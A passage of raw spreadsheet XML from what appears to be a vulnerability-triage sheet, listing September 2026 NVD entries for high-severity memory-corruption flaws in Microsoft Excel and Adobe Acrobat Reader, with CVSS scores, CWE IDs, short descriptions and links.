t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C647" s="5" t="inlineStr"><is><t>CVE-2026-81950</t></is></c><c r="D647" s="5" t="n"><v>7.8</v></c><c r="E647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G647" s="5" t="inlineStr" /><c r="H647" s="5" t="n"><v>0.004</v></c><c r="I647" s="5" t="inlineStr" /><c r="J647" s="5" t="inlineStr" /><c r="K647" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L647" s="5" t="inlineStr" /><c r="M647" s="5" t="inlineStr" /><c r="N647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P647" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q647" s="5" t="inlineStr" /><c r="R647" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S647" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t></is></c></row><row r="648"><c r="A648" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C648" s="5" t="inlineStr"><is><t>CVE-2026-81951</t></is></c><c r="D648" s="5" t="n"><v>7.8</v></c><c r="E648" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F648" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G648" s="5" t="inlineStr" /><c r="H648" s="5" t="n"><v>0.004</v></c><c r="I648" s="5" t="inlineStr" /><c r="J648" s="5" t="inlineStr" /><c r="K648" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L648" s="5" t="inlineStr" /><c r="M648" s="5" t="inlineStr" /><c r="N648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P648" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q648" s="5" t="inlineStr" /><c r="R648" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S648" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t></is></c></row><row r="649"><c r="A649" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C649" s="5" t="inlineStr"><is><t>CVE-2026-81953</t></is></c><c r="D649" s="5" t="n"><v>7.8</v></c><c r="E649" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F649" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G649" s="5" t="inlineStr" /><c r="H649" s="5" t="n"><v>0.004</v></c><c r="I649" s="5" t="inlineStr" /><c r="J649" s="5" t="inlineStr" /><c r="K649" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L649" s="5" t="inlineStr" /><c r="M649" s="5" t="inlineStr" /><c r="N649" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P649" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q649" s="5" t="inlineStr" /><c r="R649" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S649" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t></is></c></row><row r="650"><c r="A650" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C650" s="5" t="inlineStr"><is><t>CVE-2026-81954</t></is></c><c r="D650" s="5" t="n"><v>7.8</v></c><c r="E650" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F650" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G650" s="5" t="inlineStr" /><c r="H650" s="5" t="n"><v>0.003</v></c><c r="I650" s="5" t="inlineStr" /><c r="J650" s="5" t="inlineStr" /><c r="K650" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L650" s="5" t="inlineStr" /><c r="M650" s="5" t="inlineStr" /><c r="N650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P650" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q650" s="5" t="inlineStr" /><c r="R650" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S650" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t></is></c></row><row r="651"><c r="A651" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C651" s="5" t="inlineStr"><is><t>CVE-2026-81956</t></is></c><c r="D651" s="5" t="n"><v>7.8</v></c><c r="E651" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G651" s="5" t="inlineStr" /><c r="H651" s="5" t="n"><v>0.004</v></c><c r="I651" s="5" t="inlineStr" /><c r="J651" s="5" t="inlineStr" /><c r="K651" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L651" s="5" t="inlineStr" /><c r="M651" s="5" t="inlineStr" /><c r="N651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P651" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q651" s="5" t="inlineStr" /><c r="R651" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S651" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t></is></c></row><row r="652"><c r="A652" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C652" s="5" t="inlineStr"><is><t>CVE-2026-81957</t></is></c><c r="D652" s="5" t="n"><v>7.8</v></c><c r="E652" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F652" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G652" s="5" t="inlineStr" /><c r="H652" s="5" t="n"><v>0.004</v></c><c r="I652" s="5" t="inlineStr" /><c r="J652" s="5" t="inlineStr" /><c r="K652" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L652" s="5" t="inlineStr" /><c r="M652" s="5" t="inlineStr" /><c r="N652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P652" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q652" s="5" t="inlineStr" /><c r="R652" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S652" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t></is></c></row><row r="653"><c r="A653" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C653" s="5" t="inlineStr"><is><t>CVE-2026-81959</t></is></c><c r="D653" s="5" t="n"><v>7.8</v></c><c r="E653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G653" s="5" t="inlineStr" /><c r="H653" s="5" t="n"><v>0.004</v></c><c r="I653" s="5" t="inlineStr" /><c r="J653" s="5" t="inlineStr" /><c r="K653" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L653" s="5" t="inlineStr" /><c r="M653" s="5" t="inlineStr" /><c r="N653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P653" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q653" s="5" t="inlineStr" /><c r="R653" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S653" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t></is></c></row><row r="654"><c r="A654" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C654" s="5" t="inlineStr"><is><t>CVE-2026-81960</t></is></c><c r="D654" s="5" t="n"><v>7.8</v></c><c r="E654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F654" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G654" s="5" t="inlineStr" /><c r="H654" s="5" t="n"><v>0.004</v></c><c r="I654" s="5" t="inlineStr" /><c r="J654" s="5" t="inlineStr" /><c r="K654" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L654" s="5" t="inlineStr" /><c r="M654" s="5" t="inlineStr" /><c r="N654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P654" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q654" s="5" t="inlineStr" /><c r="R654" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S654" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t></is></c></row><row r="655"><c r="A655" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C655" s="5" t="inlineStr"><is><t>CVE-2026-81973</t></is></c><c r="D655" s="5" t="n"><v>7.8</v></c><c r="E655" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F655" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G655" s="5" t="inlineStr" /><c r="H655" s="5" t="n"><v>0.002</v></c><c r="I655" s="5" t="inlineStr" /><c r="J655" s="5" t="inlineStr" /><c r="K655" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L655" s="5" t="inlineStr" /><c r="M655" s="5" t="inlineStr" /><c r="N655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P655" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q655" s="5" t="inlineStr" /><c r="R655" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S655" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t></is></c></row><row r="656"><c r="A656" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C656" s="5" t="inlineStr"><is><t>CVE-2026-81975</t></is></c><c r="D656" s="5" t="n"><v>7.8</v></c><c r="E656" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F656" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G656" s="5" t="inlineStr" /><c r="H656" s="5" t="n"><v>0.002</v></c><c r="I656" s="5" t="inlineStr" /><c r="J656" s="5" t="inlineStr" /><c r="K656" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L656" s="5" t="inlineStr" /><c r="M656" s="5" t="inlineStr" /><c r="N656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P656" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q656" s="5" t="inlineStr" /><c r="R656" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S656" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t></is></c></row><row r="657"><c r="A657" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C657" s="5" t="inlineStr"><is><t>CVE-2026-81976</t></is></c><c r="D657" s="5" t="n"><v>7.8</v></c><c r="E657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F657" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G657" s="5" t="inlineStr" /><c r="H657" s="5" t="n"><v>0.002</v></c><c r="I657" s="5" t="inlineStr" /><c r="J657" s="5" t="inlineStr" /><c r="K657" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L657" s="5" t="inlineStr" /><c r="M657" s="5" t="inlineStr" /><c r="N657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P657" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q657" s="5" t="inlineStr" /><c r="R657" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S657" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t></is></c></row><row r="658"><c r="A658" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C658" s="5" t="inlineStr"><is><t>CVE-2026-81979</t></is></c><c r="D658" s="5" t="n"><v>7.8</v></c><c r="E658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F658" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G658" s="5" t="inlineStr" /><c r="H658" s="5" t="n"><v>0.002</v></c><c r="I658" s="5" t="inlineStr" /><c r="J658" s="5" t="inlineStr" /><c r="K658" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L658" s="5" t="inlineStr" /><c r="M658" s="5" t="inlineStr" /><c r="N658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P658" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q658" s="5" t="inlineStr" /><c r="R658" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S658" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t></is></c></row><row r="659"><c r="A659" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C659" s="5" t="inlineStr"><is><t>CVE-2026-81980</t></is></c><c r="D659" s="5" t="n"><v>7.8</v></c><c r="E659" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F659" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G659" s="5" t="inlineStr" /><c r="H659" s="5" t="n"><v>0.002</v></c><c r="I659" s="5" t="inlineStr" /><c r="J659" s="5" t="inlineStr" /><c r="K659" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L659" s="5" t="inlineStr" /><c r="M659" s="5" t="inlineStr" /><c r="N659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q659" s="5" t="inlineStr" /><c r="R659" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S659" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t></is></c></row><row r="660"><c r="A660" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C660" s="5" t="inlineStr"><is><t>CVE-2026-81981</t></is></c><c r="D660" s="5" t="n"><v>7.8</v></c><c r="E660" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F660" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G660" s="5" t="inlineStr" /><c r="H660" s="5" t="n"><v>0.002</v></c><c r="I660" s="5" t="inlineStr" /><c r="J660" s="5" t="inlineStr" /><c r="K660" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L660" s="5" t="inlineStr" /><c r="M660" s="5" t="inlineStr" /><c r="N660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P660" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q660" s="5" t="inlineStr" /><c r="R660" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S660" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t></is></c></row><row r="661"><c r="A661" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C661" s="5" t="inlineStr"><is><t>CVE-2026-81983</t></is></c><c r="D661" s="5" t="n"><v>7.8</v></c><c r="E661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F661" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G661" s="5" t="inlineStr" /><c r="H661" s="5" t="n"><v>0.002</v></c><c r="I661" s="5" t="inlineStr" /><c r="J661" s="5" t="inlineStr" /><c r="K661" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L661" s="5" t="inlineStr" /><c r="M661" s="5" t="inlineStr" /><c r="N661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P661" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q661" s="5" t="inlineStr" /><c r="R661" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S661" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t></is></c></row><row r="662"><c r="A662" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C662" s="5" t="inlineStr"><is><t>CVE-2026-81985</t></is></c><c r="D662" s="5" t="n"><v>7.8</v></c><c r="E662" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F662" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G662" s="5" t="inlineStr" /><c r="H662" s="5" t="n"><v>0.002</v></c><c r="I662" s="5" t="inlineStr" /><c r="J662" s="5" t="inlineStr" /><c r="K662" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L662" s="5" t="inlineStr" /><c r="M662" s="5" t="inlineStr" /><c r="N662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q662" s="5" t="inlineStr" /><c r="R662" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S662" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t></is></c></row><row r="663"><c r="A663" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C663" s="5" t="inlineStr"><is><t>CVE-2026-81986</t></is></c><c r="D663" s="5" t="n"><v>7.8</v></c><c r="E663" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F663" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G663" s="5" t="inlineStr" /><c r="H663" s="5" t="n"><v>0.002</v></c><c r="I663" s="5" t="inlineStr" /><c r="J663" s="5" t="inlineStr" /><c r="K663" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L663" s="5" t="inlineStr" /><c r="M663" s="5" t="inlineStr" /><c r="N663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P663" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q663" s="5" t="inlineStr" /><c r="R663" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S663" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t></is></c></row><row r="664"><c r="A664" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C664" s="5" t="inlineStr"><is><t>CVE-2026-81987</t></is></c><c r="D664" s="5" t="n"><v>7.8</v></c><c r="E664" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F664" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G664" s="5" t="inlineStr" /><c r="H664" s="5" t="n"><v>0.002</v></c><c r="I664" s="5" t="inlineStr" /><c r="J664" s="5" t="inlineStr" /><c r="K664" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L664" s="5" t="inlineStr" /><c r="M664" s="5" t="inlineStr" /><c r="N664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P664" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q664" s="5" t="inlineStr" /><c r="R664" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S664" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t></is></c></row><row r="665"><c r="A665" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C665" s="5" t="inlineStr"><is><t>CVE-2026-81988</t></is></c><c r="D665" s="5" t="n"><v>7.8</v></c><c r="E665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F665" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G665" s="5" t="inlineStr" /><c r="H665" s="5" t="n"><v>0.002</v></c><c r="I665" s="5" t="inlineStr" /><c r="J665" s="5" t="inlineStr" /><c r="K665" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L665" s="5" t="inlineStr" /><c r="M665" s="5" t="inlineStr" /><c r="N665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P665" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q665" s="5" t="inlineStr" /><c r="R665" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S665" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t></is></c></row><row r="666"><c r="A666" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C666" s="5" t="inlineStr"><is><t>CVE-2026-81989</t></is></c><c r="D666" s="5" t="n"><v>7.8</v></c><c r="E666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F666" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G666" s="5" t="inlineStr" /><c r="H666" s="5" t="n"><v>0.002</v></c><c r="I666" s="5" t="inlineStr" /><c r="J666" s="5" t="inlineStr" /><c r="K666" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L666" s="5" t="inlineStr" /><c r="M666" s="5" t="inlineStr" /><c r="N666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P666" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q666" s="5" t="inlineStr" /><c r="R666" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S666" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t></is></c></row><row r="667"><c r="A667" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C667" s="5" t="inlineStr"><is><t>CVE-2026-81990</t></is></c><c r="D667" s="5" t="n"><v>7.8</v></c><c r="E667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F667" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G667" s="5" t="inlineStr" /><c r="H667" s="5" t="n"><v>0.002</v></c><c r="I667" s="5" t="inlineStr" /><c r="J667" s="5" t="inlineStr" /><c r="K667" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, 